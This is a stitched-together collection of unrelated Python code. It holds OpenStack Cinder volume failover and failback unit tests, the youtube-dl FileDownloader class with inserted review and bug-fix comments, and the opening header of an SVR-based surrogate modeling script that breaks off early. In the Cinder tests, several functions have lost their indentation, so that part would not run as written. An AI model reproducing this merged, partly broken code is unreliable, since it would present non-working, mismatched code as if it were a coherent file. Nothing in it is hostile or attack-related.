    @mock.patch('cinder.volume.driver.BaseVD.failover_completed')
    def test_failover_completed(self, completed_mock):
        """Successful failover_completed persists backend id and status."""
        rep_field = fields.ReplicationStatus
        svc = objects.Service(self.context, host=self.volume.host,
                              binary=constants.VOLUME_BINARY,
                              replication_status=rep_field.ENABLED)
        svc.create()
        self.volume.failover_completed(
            self.context,
            {'active_backend_id': 'secondary',
             'replication_status': rep_field.FAILED_OVER})
        service = objects.Service.get_by_id(self.context, svc.id)
        self.assertEqual('secondary', service.active_backend_id)
        self.assertEqual('failed-over', service.replication_status)
        completed_mock.assert_called_once_with(self.context, 'secondary')
    # NOTE(review): wraps=True makes the mock delegate its calls to ``True``,
    # which is not callable -- presumably a deliberate trick to make the
    # driver call raise; confirm this is the intended failure injection.
    @mock.patch('cinder.volume.driver.BaseVD.failover_completed', wraps=True)
    def test_failover_completed_driver_failure(self, completed_mock):
        """A driver failure in failover_completed disables the service."""
        rep_field = fields.ReplicationStatus
        svc = objects.Service(self.context, host=self.volume.host,
                              binary=constants.VOLUME_BINARY,
                              replication_status=rep_field.ENABLED)
        svc.create()
        self.volume.failover_completed(
            self.context,
            {'active_backend_id': 'secondary',
             'replication_status': rep_field.FAILED_OVER})
        service = objects.Service.get_by_id(self.context, svc.id)
        self.assertEqual('secondary', service.active_backend_id)
        self.assertEqual(rep_field.ERROR, service.replication_status)
        self.assertTrue(service.disabled)
        self.assertIsNotNone(service.disabled_reason)
        completed_mock.assert_called_once_with(self.context, 'secondary')
    @mock.patch('cinder.volume.rpcapi.VolumeAPI.failover_completed')
    def test_finish_failover_non_clustered(self, completed_mock):
        """Non-clustered services are updated directly, with no RPC fanout."""
        svc = mock.Mock(is_clustered=None)
        self.volume.finish_failover(self.context, svc, mock.sentinel.updates)
        svc.update.assert_called_once_with(mock.sentinel.updates)
        svc.save.assert_called_once_with()
        completed_mock.assert_not_called()
    @mock.patch('cinder.volume.rpcapi.VolumeAPI.failover_completed')
    def test_finish_failover_clustered(self, completed_mock):
        """Clustered services broadcast completion over RPC."""
        svc = mock.Mock(cluster_name='cluster_name')
        updates = {'status': 'error'}
        self.volume.finish_failover(self.context, svc, updates)
        completed_mock.assert_called_once_with(self.context, svc, updates)
        # NOTE(review): this line *assigns* the cluster status instead of
        # asserting it; it looks like an assertEqual was intended -- confirm
        # against finish_failover's expected behavior.
        svc.cluster.status = 'error'
        svc.cluster.save.assert_called_once()
    @ddt.data(None, 'cluster_name')
    @mock.patch('cinder.volume.manager.VolumeManager.finish_failover')
    @mock.patch('cinder.volume.manager.VolumeManager._get_my_volumes')
    def test_failover_manager(self, cluster, get_vols_mock, finish_mock):
        """Test manager's failover method for clustered and not clustered."""
        rep_field = fields.ReplicationStatus
        svc = objects.Service(self.context, host=self.volume.host,
                              binary=constants.VOLUME_BINARY,
                              cluster_name=cluster,
                              replication_status=rep_field.ENABLED)
        svc.create()
        vol = objects.Volume(self.context, host=self.volume.host)
        vol.create()
        get_vols_mock.return_value = [vol]
        with mock.patch.object(self.volume, 'driver') as driver:
            # Standalone backends use driver.failover_host, clustered ones
            # driver.failover; swap the expected/forbidden call accordingly.
            called, not_called = driver.failover_host, driver.failover
            if cluster:
                called, not_called = not_called, called
            called.return_value = ('secondary', [{'volume_id': vol.id,
                                   'updates': {'status': 'error'}}], [])
            self.volume.failover(self.context,
                                 secondary_backend_id='secondary')
        not_called.assert_not_called()
        called.assert_called_once_with(self.context, [vol],
                                       secondary_id='secondary', groups=[])
        expected_update = {'replication_status': rep_field.FAILED_OVER,
                           'active_backend_id': 'secondary',
                           'disabled': True,
                           'disabled_reason': 'failed-over'}
        finish_mock.assert_called_once_with(self.context, svc, expected_update)
        volume = objects.Volume.get_by_id(self.context, vol.id)
        self.assertEqual('error', volume.status)
    @ddt.data(('host1', None), (None, 'mycluster'))
    @ddt.unpack
    def test_failover_api_fail_multiple_results(self, host, cluster):
        """Fail if we try to failover multiple backends in the same request."""
        rep_field = fields.ReplicationStatus
        clusters = [
            objects.Cluster(self.context,
                            name='mycluster@backend1',
                            replication_status=rep_field.ENABLED,
                            binary=constants.VOLUME_BINARY),
            objects.Cluster(self.context,
                            name='mycluster@backend2',
                            replication_status=rep_field.ENABLED,
                            binary=constants.VOLUME_BINARY)
        ]
        clusters[0].create()
        clusters[1].create()
        services = [
            objects.Service(self.context, host='host1@backend1',
                            cluster_name=clusters[0].name,
                            replication_status=rep_field.ENABLED,
                            binary=constants.VOLUME_BINARY),
            objects.Service(self.context, host='host1@backend2',
                            cluster_name=clusters[1].name,
                            replication_status=rep_field.ENABLED,
                            binary=constants.VOLUME_BINARY),
        ]
        services[0].create()
        services[1].create()
        # Either filter (host or cluster) matches two different backends,
        # so the API must refuse the ambiguous request.
        self.assertRaises(exception.Invalid,
                          self.volume_api.failover, self.context, host,
                          cluster)
def test_failover_api_not_found(self):
self.assertRaises(exception.ServiceNotFound, self.volume_api.failover,
self.context, 'host1', None)
    @mock.patch('cinder.volume.rpcapi.VolumeAPI.failover')
    def test_failover_api_success_multiple_results(self, failover_mock):
        """Succeed to failover multiple services for the same backend."""
        rep_field = fields.ReplicationStatus
        cluster_name = 'mycluster@backend1'
        cluster = objects.Cluster(self.context,
                                  name=cluster_name,
                                  replication_status=rep_field.ENABLED,
                                  binary=constants.VOLUME_BINARY)
        cluster.create()
        services = [
            objects.Service(self.context, host='host1@backend1',
                            cluster_name=cluster_name,
                            replication_status=rep_field.ENABLED,
                            binary=constants.VOLUME_BINARY),
            objects.Service(self.context, host='host2@backend1',
                            cluster_name=cluster_name,
                            replication_status=rep_field.ENABLED,
                            binary=constants.VOLUME_BINARY),
        ]
        services[0].create()
        services[1].create()
        self.volume_api.failover(self.context, None, cluster_name,
                                 mock.sentinel.secondary_id)
        for service in services + [cluster]:
            # In-memory objects still hold the pre-call status; only a
            # refresh reveals the DB-side FAILING_OVER transition.
            self.assertEqual(rep_field.ENABLED, service.replication_status)
            service.refresh()
            self.assertEqual(rep_field.FAILING_OVER,
                             service.replication_status)
        failover_mock.assert_called_once_with(self.context, mock.ANY,
                                              mock.sentinel.secondary_id)
        self.assertEqual(services[0].id, failover_mock.call_args[0][1].id)
    @mock.patch('cinder.volume.rpcapi.VolumeAPI.failover')
    def test_failover_api_success_multiple_results_not_updated(self,
                                                               failover_mock):
        """Succeed to failover even if a service is not updated."""
        rep_field = fields.ReplicationStatus
        cluster_name = 'mycluster@backend1'
        cluster = objects.Cluster(self.context,
                                  name=cluster_name,
                                  replication_status=rep_field.ENABLED,
                                  binary=constants.VOLUME_BINARY)
        cluster.create()
        services = [
            objects.Service(self.context, host='host1@backend1',
                            cluster_name=cluster_name,
                            replication_status=rep_field.ENABLED,
                            binary=constants.VOLUME_BINARY),
            objects.Service(self.context, host='host2@backend1',
                            cluster_name=cluster_name,
                            replication_status=rep_field.ERROR,
                            binary=constants.VOLUME_BINARY),
        ]
        services[0].create()
        services[1].create()
        self.volume_api.failover(self.context, None, cluster_name,
                                 mock.sentinel.secondary_id)
        # Only the healthy service and the cluster move to FAILING_OVER.
        for service in services[:1] + [cluster]:
            service.refresh()
            self.assertEqual(rep_field.FAILING_OVER,
                             service.replication_status)
        # The service that was already in ERROR is left untouched.
        services[1].refresh()
        self.assertEqual(rep_field.ERROR, services[1].replication_status)
        failover_mock.assert_called_once_with(self.context, mock.ANY,
                                              mock.sentinel.secondary_id)
        self.assertEqual(services[0].id, failover_mock.call_args[0][1].id)
    @mock.patch('cinder.volume.rpcapi.VolumeAPI.failover')
    def test_failover_api_fail_multiple_results_not_updated(self,
                                                            failover_mock):
        """Fail if none of the services could be updated."""
        rep_field = fields.ReplicationStatus
        cluster_name = 'mycluster@backend1'
        cluster = objects.Cluster(self.context,
                                  name=cluster_name,
                                  replication_status=rep_field.ENABLED,
                                  binary=constants.VOLUME_BINARY)
        cluster.create()
        # Timestamps far in the past make the first service look dead.
        down_time = timeutils.datetime.datetime(1970, 1, 1)
        services = [
            # This service is down
            objects.Service(self.context, host='host1@backend1',
                            cluster_name=cluster_name,
                            replication_status=rep_field.ENABLED,
                            created_at=down_time,
                            updated_at=down_time,
                            modified_at=down_time,
                            binary=constants.VOLUME_BINARY),
            # This service is not with the right replication status
            objects.Service(self.context, host='host2@backend1',
                            cluster_name=cluster_name,
                            replication_status=rep_field.ERROR,
                            binary=constants.VOLUME_BINARY),
        ]
        services[0].create()
        services[1].create()
        self.assertRaises(exception.InvalidInput,
                          self.volume_api.failover, self.context, None,
                          cluster_name, mock.sentinel.secondary_id)
        # Nothing changed in the DB and no RPC was ever sent.
        for service in services:
            svc = objects.Service.get_by_id(self.context, service.id)
            self.assertEqual(service.replication_status,
                             svc.replication_status)
        cluster.refresh()
        self.assertEqual(rep_field.ENABLED, cluster.replication_status)
        failover_mock.assert_not_called()
def _check_failover_db(self, get_method, expected_results):
db_data = get_method.get_all(self.context, None)
db_data = {e.id: e for e in db_data}
for expected in expected_results:
id_ = expected['id']
for key, value in expected.items():
self.assertEqual(value, getattr(db_data[id_], key),
'(%s) ref=%s != act=%s' % (
key, expected, dict(db_data[id_])))
def _test_failover_model_updates(self, in_volumes, in_snapshots,
driver_volumes, driver_result,
out_volumes, out_snapshots,
in_groups=None, out_groups=None,
driver_group_result=None,
secondary_id=None):
host = vol_utils.extract_host(self.manager.host)
utils.create_service(self.context, {'host': host,
'binary': 'cinder-volume'})
for volume in in_volumes:
utils.create_volume(self.context, self.manager.host, **volume)
for snapshot in in_snapshots:
utils.create_snapshot(self.context, **snapshot)
for group in in_groups:
utils.create_group(self.context, self.manager.host, **group)
with mock.patch.object(
self.manager.driver, 'failover_host',
return_value=(secondary_id, driver_result,
driver_group_result)) as driver_mock:
self.manager.failover_host(self.context, secondary_id)
self.assertSetEqual(driver_volumes,
{v.id for v in driver_mock.call_args[0][1]})
self._check_failover_db(objects.VolumeList, out_volumes)
self._check_failover_db(objects.SnapshotList, out_snapshots)
self._check_failover_db(objects.GroupList, out_groups)
    @mock.patch('cinder.volume.utils.is_group_a_type')
    def test_failover_host_model_updates(self, mock_group_type):
        """Check volume/snapshot/group DB updates after a host failover."""
        status = fields.ReplicationStatus
        mock_group_type.return_value = True
        # Replication groups: one that fails to fail over, one that succeeds.
        in_groups = [
            {'id': str(uuid.uuid4()), 'status': 'available',
             'group_type_id': fake.GROUP_TYPE_ID,
             'volume_type_ids': [fake.VOLUME_TYPE_ID],
             'replication_status': status.FAILOVER_ERROR},
            {'id': str(uuid.uuid4()), 'status': 'available',
             'group_type_id': fake.GROUP_TYPE_ID,
             'volume_type_ids': [fake.VOLUME_TYPE_ID],
             'replication_status': status.ENABLED},
        ]
        driver_group_result = [
            {'group_id': in_groups[0]['id'],
             'updates': {'replication_status': status.FAILOVER_ERROR}},
            {'group_id': in_groups[1]['id'],
             'updates': {'replication_status': status.FAILED_OVER}},
        ]
        out_groups = [
            {'id': in_groups[0]['id'], 'status': 'error',
             'replication_status': status.FAILOVER_ERROR},
            {'id': in_groups[1]['id'], 'status': in_groups[1]['status'],
             'replication_status': status.FAILED_OVER},
        ]
        # test volumes
        in_volumes = [
            {'id': str(uuid.uuid4()), 'status': 'available',
             'replication_status': status.DISABLED},
            {'id': str(uuid.uuid4()), 'status': 'in-use',
             'replication_status': status.NOT_CAPABLE},
            {'id': str(uuid.uuid4()), 'status': 'available',
             'replication_status': status.FAILOVER_ERROR},
            {'id': str(uuid.uuid4()), 'status': 'in-use',
             'replication_status': status.ENABLED},
            {'id': str(uuid.uuid4()), 'status': 'available',
             'replication_status': status.FAILOVER_ERROR},
            {'id': str(uuid.uuid4()), 'status': 'in-use',
             'replication_status': status.ENABLED},
            {'id': str(uuid.uuid4()), 'status': 'available',
             'group_id': in_groups[0]['id'],
             'replication_status': status.FAILOVER_ERROR},
            {'id': str(uuid.uuid4()), 'status': 'available',
             'group_id': in_groups[1]['id'],
             'replication_status': status.ENABLED},
        ]
        in_snapshots = [
            {'id': v['id'], 'volume_id': v['id'], 'status': 'available'}
            for v in in_volumes
        ]
        # Only replication-capable volumes must be handed to the driver.
        driver_volumes = {
            v['id'] for v in in_volumes
            if v['replication_status'] not in (status.DISABLED,
                                               status.NOT_CAPABLE)}
        driver_result = [
            {'volume_id': in_volumes[3]['id'],
             'updates': {'status': 'error'}},
            {'volume_id': in_volumes[4]['id'],
             'updates': {'replication_status': status.FAILOVER_ERROR}},
            {'volume_id': in_volumes[5]['id'],
             'updates': {'replication_status': status.FAILED_OVER}},
            {'volume_id': in_volumes[6]['id'],
             'updates': {'replication_status': status.FAILOVER_ERROR}},
            {'volume_id': in_volumes[7]['id'],
             'updates': {'replication_status': status.FAILED_OVER}},
        ]
        out_volumes = [
            {'id': in_volumes[0]['id'], 'status': 'error',
             'replication_status': status.NOT_CAPABLE,
             'previous_status': in_volumes[0]['status']},
            {'id': in_volumes[1]['id'], 'status': 'error',
             'replication_status': status.NOT_CAPABLE,
             'previous_status': in_volumes[1]['status']},
            {'id': in_volumes[2]['id'], 'status': in_volumes[2]['status'],
             'replication_status': status.FAILED_OVER},
            {'id': in_volumes[3]['id'], 'status': 'error',
             'previous_status': in_volumes[3]['status'],
             'replication_status': status.FAILOVER_ERROR},
            {'id': in_volumes[4]['id'], 'status': 'error',
             'previous_status': in_volumes[4]['status'],
             'replication_status': status.FAILOVER_ERROR},
            {'id': in_volumes[5]['id'], 'status': in_volumes[5]['status'],
             'replication_status': status.FAILED_OVER},
            {'id': in_volumes[6]['id'], 'status': 'error',
             'previous_status': in_volumes[6]['status'],
             'replication_status': status.FAILOVER_ERROR},
            {'id': in_volumes[7]['id'], 'status': in_volumes[7]['status'],
             'replication_status': status.FAILED_OVER},
        ]
        # Snapshots of errored volumes must end up in error as well.
        out_snapshots = [
            {'id': ov['id'],
             'status': 'error' if ov['status'] == 'error' else 'available'}
            for ov in out_volumes
        ]
        self._test_failover_model_updates(in_volumes, in_snapshots,
                                          driver_volumes, driver_result,
                                          out_volumes, out_snapshots,
                                          in_groups, out_groups,
                                          driver_group_result)
def test_failback_host_model_updates(self):
status = fields.ReplicationStatus
# IDs will be overwritten with UUIDs, but they help follow the code
in_volumes = [
{'id': 0, 'status': 'available',
'replication_status': status.DISABLED},
{'id': 1, 'status': 'in-use',
'replication_status': status.NOT_CAPABLE},
{'id': 2, 'status': 'available',
'replication_status': status.FAILOVER_ERROR},
{'id': 3, 'status': 'in-use',
'replication_status': status.ENABLED},
{'id': 4, 'status': 'available',
'replication_status': status.FAILOVER_ERROR},
{'id': 5, 'status': 'in-use',
'replication_status': status.FAILED_OVER},
]
# Generate real volume IDs
for volume in in_volumes:
volume['id'] = str(uuid.uuid4())
in_snapshots = [
{'id': in_volumes[0]['id'], 'volume_id': in_volumes[0]['id'],
'status': fields.SnapshotStatus.ERROR_DELETING},
{'id': in_volumes[1]['id'], 'volume_id': in_volumes[1]['id'],
'status': fields.SnapshotStatus.AVAILABLE},
{'id': in_volumes[2]['id'], 'volume_id': in_volumes[2]['id'],
'status': fields.SnapshotStatus.CREATING},
{'id': in_volumes[3]['id'], 'volume_id': in_volumes[3]['id'],
'status': fields.SnapshotStatus.DELETING},
{'id': in_volumes[4]['id'], 'volume_id': in_volumes[4]['id'],
'status': fields.SnapshotStatus.CREATING},
{'id': in_volumes[5]['id'], 'volume_id': in_volumes[5]['id'],
'status': fields.SnapshotStatus.CREATING},
]
driver_volumes = {
v['id'] for v in in_volumes
if v['replication_status'] not in (status.DISABLED,
status.NOT_CAPABLE)}
driver_result = [
{'volume_id': in_volumes[3]['id'],
'updates': {'status': 'error'}},
{'volume_id': in_volumes[4]['id'],
'updates': {'replication_status': status.FAILOVER_ERROR}},
{'volume_id': in_volumes[5]['id'],
'updates': {'replication_status': status.FAILED_OVER}},
]
out_volumes = [
{'id': in_volumes[0]['id'], 'status': in_volumes[0]['status'],
'replication_status': in_volumes[0]['replication_status'],
'previous_status': None},
{'id': in_volumes[1]['id'], 'status': in_volumes[1]['status'],
'replication_status': in_volumes[1]['replication_status'],
'previous_status': None},
{'id': in_volumes[2]['id'], 'status': in_volumes[2]['status'],
'replication_status': status.ENABLED},
{'id': in_volumes[3]['id'], 'status': 'error',
'previous_status': in_volumes[3]['status'],
'replication_status': status.FAILOVER_ERROR},
{'id': in_volumes[4]['id'], 'status': 'error',
'previous_status': in_volumes[4]['status'],
'replication_status': status.FAILOVER_ERROR},
{'id': in_volumes[5]['id'], 'status': in_volumes[5]['status'],
'replication_status': status.ENABLED},
]
# Snapshot status is preserved except for those that error the failback
out_snapshots = in_snapshots[:]
out_snapshots[3]['status'] = fields.SnapshotStatus.ERROR
out_snapshots[4]['status'] = fields.SnapshotStatus.ERROR
self._test_failover_model_updates(in_volumes, in_snapshots,
driver_volumes, driver_result,
out_volumes, out_snapshots,
[], [], [],
self.manager.FAILBACK_SENTINEL)
| |
from __future__ import division, unicode_literals
import os
import re
import sys
import time
from ..compat import compat_str
from ..utils import (
encodeFilename,
format_bytes,
timeconvert,
)
class FileDownloader(object):
    """File Downloader class.

    File downloader objects are the ones responsible of downloading the
    actual video file and writing it to disk.

    File downloaders accept a lot of parameters. In order not to saturate
    the object constructor with arguments, it receives a dictionary of
    options instead.

    Available options:

    verbose:            Print additional info to stdout.
    quiet:              Do not print messages to stdout.
    ratelimit:          Download speed limit, in bytes/sec.
    retries:            Number of times to retry for HTTP error 5xx
    buffersize:         Size of download buffer in bytes.
    noresizebuffer:     Do not automatically resize the download buffer.
    continuedl:         Try to continue downloads if possible.
    noprogress:         Do not print the progress bar.
    logtostderr:        Log messages to stderr instead of stdout.
    consoletitle:       Display progress in console window's titlebar.
    nopart:             Do not use temporary .part files.
    updatetime:         Use the Last-modified header to set output file timestamps.
    test:               Download only first bytes to test the downloader.
    min_filesize:       Skip files smaller than this size
    max_filesize:       Skip files larger than this size
    xattr_set_filesize: Set ytdl.filesize user xattribute with expected size.
                        (experimental)
    external_downloader_args:  A list of additional command-line arguments for
                        the external downloader.

    Subclasses of this one must re-define the real_download method.
    """

    _TEST_FILE_SIZE = 10241

    # Replaced with the options dictionary in __init__.
    params = None

    def __init__(self, ydl, params):
        """Create a FileDownloader object with the given options."""
        self.ydl = ydl
        self._progress_hooks = []
        self.params = params
        self.add_progress_hook(self.report_progress)

    @staticmethod
    def format_seconds(seconds):
        """Render a duration in seconds as 'MM:SS' or 'HH:MM:SS'
        ('--:--:--' for durations of 100 hours or more)."""
        (mins, secs) = divmod(seconds, 60)
        (hours, mins) = divmod(mins, 60)
        if hours > 99:
            return '--:--:--'
        if hours == 0:
            return '%02d:%02d' % (mins, secs)
        else:
            return '%02d:%02d:%02d' % (hours, mins, secs)

    @staticmethod
    def calc_percent(byte_counter, data_len):
        """Return the downloaded percentage, or None if the total is unknown."""
        if data_len is None:
            return None
        return float(byte_counter) / float(data_len) * 100.0

    @staticmethod
    def format_percent(percent):
        """Render a percentage as a fixed-width string ('---.-%' if unknown)."""
        if percent is None:
            return '---.-%'
        return '%6s' % ('%3.1f%%' % percent)

    @staticmethod
    def calc_eta(start, now, total, current):
        """Estimate the remaining seconds from the average rate so far.

        Returns None when the total size is unknown, or when elapsed time /
        progress is too small to derive a meaningful rate.
        """
        if total is None:
            return None
        if now is None:
            now = time.time()
        dif = now - start
        if current == 0 or dif < 0.001:  # One millisecond
            return None
        rate = float(current) / dif
        return int((float(total) - float(current)) / rate)

    @staticmethod
    def format_eta(eta):
        """Render an ETA in seconds as a clock string ('--:--' if unknown)."""
        if eta is None:
            return '--:--'
        return FileDownloader.format_seconds(eta)

    @staticmethod
    def calc_speed(start, now, bytes):
        """Return the average speed in bytes/sec, or None if unmeasurable."""
        dif = now - start
        if bytes == 0 or dif < 0.001:  # One millisecond
            return None
        return float(bytes) / dif

    @staticmethod
    def format_speed(speed):
        """Render a speed as a fixed-width human-readable string."""
        if speed is None:
            return '%10s' % '---b/s'
        return '%10s' % ('%s/s' % format_bytes(speed))

    @staticmethod
    def best_block_size(elapsed_time, bytes):
        """Pick the next read size from the last chunk's throughput, clamped
        between half and double the previous size, never above 4 MB."""
        new_min = max(bytes / 2.0, 1.0)
        new_max = min(max(bytes * 2.0, 1.0), 4194304)  # Do not surpass 4 MB
        if elapsed_time < 0.001:
            return int(new_max)
        rate = bytes / elapsed_time
        if rate > new_max:
            return int(new_max)
        if rate < new_min:
            return int(new_min)
        return int(rate)

    @staticmethod
    def parse_bytes(bytestr):
        """Parse a string indicating a byte quantity into an integer."""
        matchobj = re.match(r'(?i)^(\d+(?:\.\d+)?)([kMGTPEZY]?)$', bytestr)
        if matchobj is None:
            return None
        number = float(matchobj.group(1))
        # An empty suffix matches index 0 of 'bkmgtpezy', i.e. multiplier 1.
        multiplier = 1024.0 ** 'bkmgtpezy'.index(matchobj.group(2).lower())
        return int(round(number * multiplier))

    def to_screen(self, *args, **kargs):
        self.ydl.to_screen(*args, **kargs)

    def to_stderr(self, message):
        # NOTE(review): this forwards to to_screen rather than a dedicated
        # stderr sink; the ydl object decides the actual output stream.
        self.ydl.to_screen(message)

    def to_console_title(self, message):
        self.ydl.to_console_title(message)

    def trouble(self, *args, **kargs):
        self.ydl.trouble(*args, **kargs)

    def report_warning(self, *args, **kargs):
        self.ydl.report_warning(*args, **kargs)

    def report_error(self, *args, **kargs):
        self.ydl.report_error(*args, **kargs)

    def slow_down(self, start_time, now, byte_counter):
        """Sleep if the download speed is over the rate limit."""
        rate_limit = self.params.get('ratelimit', None)
        if rate_limit is None or byte_counter == 0:
            return
        if now is None:
            now = time.time()
        elapsed = now - start_time
        if elapsed <= 0.0:
            return
        speed = float(byte_counter) / elapsed
        if speed > rate_limit:
            # Sleep just long enough for the running average to drop back
            # to the configured limit.
            time.sleep(max((byte_counter // rate_limit) - elapsed, 0))

    def temp_name(self, filename):
        """Returns a temporary filename for the given filename."""
        # No .part file for stdout, when disabled, or when the path exists
        # but is not a regular file (e.g. a named pipe).
        if self.params.get('nopart', False) or filename == '-' or \
                (os.path.exists(encodeFilename(filename)) and not os.path.isfile(encodeFilename(filename))):
            return filename
        return filename + '.part'

    def undo_temp_name(self, filename):
        """Strip the '.part' suffix added by temp_name, if present."""
        if filename.endswith('.part'):
            return filename[:-len('.part')]
        return filename

    def try_rename(self, old_filename, new_filename):
        """Rename a file, reporting (not raising) OS-level failures."""
        try:
            if old_filename == new_filename:
                return
            os.rename(encodeFilename(old_filename), encodeFilename(new_filename))
        except (IOError, OSError) as err:
            self.report_error('unable to rename file: %s' % compat_str(err))

    def try_utime(self, filename, last_modified_hdr):
        """Try to set the last-modified time of the given file."""
        if last_modified_hdr is None:
            return
        if not os.path.isfile(encodeFilename(filename)):
            return
        timestr = last_modified_hdr
        if timestr is None:
            return
        filetime = timeconvert(timestr)
        if filetime is None:
            return filetime
        # Ignore obviously invalid dates
        if filetime == 0:
            return
        try:
            os.utime(filename, (time.time(), filetime))
        except Exception:
            pass
        return filetime

    def report_destination(self, filename):
        """Report destination filename."""
        self.to_screen('[download] Destination: ' + filename)

    def _report_progress_status(self, msg, is_last_line=False):
        """Print a progress line, either appending a newline or rewriting
        the current terminal line in place, and mirror it to the title bar."""
        fullmsg = '[download] ' + msg
        if self.params.get('progress_with_newline', False):
            self.to_screen(fullmsg)
        else:
            if os.name == 'nt':
                # Windows consoles cannot clear to end-of-line; pad with
                # spaces so a shorter line fully overwrites the previous one.
                prev_len = getattr(self, '_report_progress_prev_line_length',
                                   0)
                if prev_len > len(fullmsg):
                    fullmsg += ' ' * (prev_len - len(fullmsg))
                self._report_progress_prev_line_length = len(fullmsg)
                clear_line = '\r'
            else:
                clear_line = ('\r\x1b[K' if sys.stderr.isatty() else '\r')
            self.to_screen(clear_line + fullmsg, skip_eol=not is_last_line)
        self.to_console_title('youtube-dl ' + msg)

    def report_progress(self, s):
        """Default progress hook: render the status dictionary *s* as a
        progress line (or a completion message) on the screen."""
        if s['status'] == 'finished':
            if self.params.get('noprogress', False):
                self.to_screen('[download] Download completed')
            else:
                s['_total_bytes_str'] = format_bytes(s['total_bytes'])
                if s.get('elapsed') is not None:
                    s['_elapsed_str'] = self.format_seconds(s['elapsed'])
                    msg_template = '100%% of %(_total_bytes_str)s in %(_elapsed_str)s'
                else:
                    msg_template = '100%% of %(_total_bytes_str)s'
                self._report_progress_status(
                    msg_template % s, is_last_line=True)

        if self.params.get('noprogress'):
            return

        if s['status'] != 'downloading':
            return

        if s.get('eta') is not None:
            s['_eta_str'] = self.format_eta(s['eta'])
        else:
            s['_eta_str'] = 'Unknown ETA'

        if s.get('total_bytes') and s.get('downloaded_bytes') is not None:
            s['_percent_str'] = self.format_percent(100 * s['downloaded_bytes'] / s['total_bytes'])
        elif s.get('total_bytes_estimate') and s.get('downloaded_bytes') is not None:
            s['_percent_str'] = self.format_percent(100 * s['downloaded_bytes'] / s['total_bytes_estimate'])
        else:
            if s.get('downloaded_bytes') == 0:
                s['_percent_str'] = self.format_percent(0)
            else:
                s['_percent_str'] = 'Unknown %'

        if s.get('speed') is not None:
            s['_speed_str'] = self.format_speed(s['speed'])
        else:
            s['_speed_str'] = 'Unknown speed'

        if s.get('total_bytes') is not None:
            s['_total_bytes_str'] = format_bytes(s['total_bytes'])
            msg_template = '%(_percent_str)s of %(_total_bytes_str)s at %(_speed_str)s ETA %(_eta_str)s'
        elif s.get('total_bytes_estimate') is not None:
            s['_total_bytes_estimate_str'] = format_bytes(s['total_bytes_estimate'])
            msg_template = '%(_percent_str)s of ~%(_total_bytes_estimate_str)s at %(_speed_str)s ETA %(_eta_str)s'
        else:
            if s.get('downloaded_bytes') is not None:
                s['_downloaded_bytes_str'] = format_bytes(s['downloaded_bytes'])
                if s.get('elapsed'):
                    s['_elapsed_str'] = self.format_seconds(s['elapsed'])
                    msg_template = '%(_downloaded_bytes_str)s at %(_speed_str)s (%(_elapsed_str)s)'
                else:
                    msg_template = '%(_downloaded_bytes_str)s at %(_speed_str)s'
            else:
                # Bug fix: the template used to contain a stray ' % ' which
                # forms an invalid %-conversion ('% a') and raised ValueError
                # whenever neither size nor byte-count info was available.
                msg_template = '%(_percent_str)s at %(_speed_str)s ETA %(_eta_str)s'

        self._report_progress_status(msg_template % s)

    def report_resuming_byte(self, resume_len):
        """Report attempt to resume at given byte."""
        self.to_screen('[download] Resuming download at byte %s' % resume_len)

    def report_retry(self, count, retries):
        """Report retry in case of HTTP error 5xx"""
        self.to_screen('[download] Got server HTTP error. Retrying (attempt %d of %d)...' % (count, retries))

    def report_file_already_downloaded(self, file_name):
        """Report file has already been fully downloaded."""
        try:
            self.to_screen('[download] %s has already been downloaded' % file_name)
        except UnicodeEncodeError:
            self.to_screen('[download] The file has already been downloaded')

    def report_unable_to_resume(self):
        """Report it was impossible to resume download."""
        self.to_screen('[download] Unable to resume')

    def download(self, filename, info_dict):
        """Download to a filename using the info from info_dict
        Return True on success and False otherwise
        """
        nooverwrites_and_exists = (
            self.params.get('nooverwrites', False) and
            os.path.exists(encodeFilename(filename))
        )

        continuedl_and_exists = (
            self.params.get('continuedl', True) and
            os.path.isfile(encodeFilename(filename)) and
            not self.params.get('nopart', False)
        )

        # Check file already present
        # NOTE(review): 'and' binds tighter than 'or', so continuedl_and_exists
        # alone satisfies this test regardless of the filename check.
        if filename != '-' and nooverwrites_and_exists or continuedl_and_exists:
            self.report_file_already_downloaded(filename)
            self._hook_progress({
                'filename': filename,
                'status': 'finished',
                'total_bytes': os.path.getsize(encodeFilename(filename)),
            })
            return True

        sleep_interval = self.params.get('sleep_interval')
        if sleep_interval:
            self.to_screen('[download] Sleeping %s seconds...' % sleep_interval)
            time.sleep(sleep_interval)

        return self.real_download(filename, info_dict)

    def real_download(self, filename, info_dict):
        """Real download process. Redefine in subclasses."""
        raise NotImplementedError('This method must be implemented by subclasses')

    def _hook_progress(self, status):
        # Fan the status dictionary out to every registered progress hook.
        for ph in self._progress_hooks:
            ph(status)

    def add_progress_hook(self, ph):
        # See YoutubeDl.py (search for progress_hooks) for a description of
        # this interface
        self._progress_hooks.append(ph)

    def _debug_cmd(self, args, subprocess_encoding, exe=None):
        """With 'verbose' enabled, print the external downloader command
        line that is about to be executed."""
        if not self.params.get('verbose', False):
            return

        if exe is None:
            exe = os.path.basename(args[0])

        if subprocess_encoding:
            str_args = [
                a.decode(subprocess_encoding) if isinstance(a, bytes) else a
                for a in args]
        else:
            str_args = args

        try:
            import pipes
            # Previously the lambda shadowed and ignored its parameter,
            # closing over str_args instead; using the parameter is
            # equivalent here and removes the shadowing.
            shell_quote = lambda args: ' '.join(map(pipes.quote, args))
        except ImportError:
            shell_quote = repr

        self.to_screen('[debug] %s command line: %s' % (
            exe, shell_quote(str_args)))
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright 2017 Masten Space Systems, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Author: Jack Nelson <jnelson@masten.aero>
"""
import csv
import os
import sys
import logging
from time import time
from operator import itemgetter
from itertools import izip
import pickle
import numpy as np
from sklearn.svm import SVR
from sklearn import cross_validation
from sklearn import preprocessing
from sklearn import grid_search
from sklearn import metrics
from scipy import stats
import pandas as pd
"""
surrogate_modeler.py
We construct the surrogate model by performing Support Vector Regression (SVR) with a Radial Basis
Function (RBF) kernel using Scikit-learn's Support Vector Machine (SVM) library.
The inputs to the modeling algorithm serve as training data for the SVR algorithm. This includes the
geometric description of each design in the training run, that is the independent or "design" variables,
and the corresponding CFD output metrics, the dependent variables or "performance metrics".
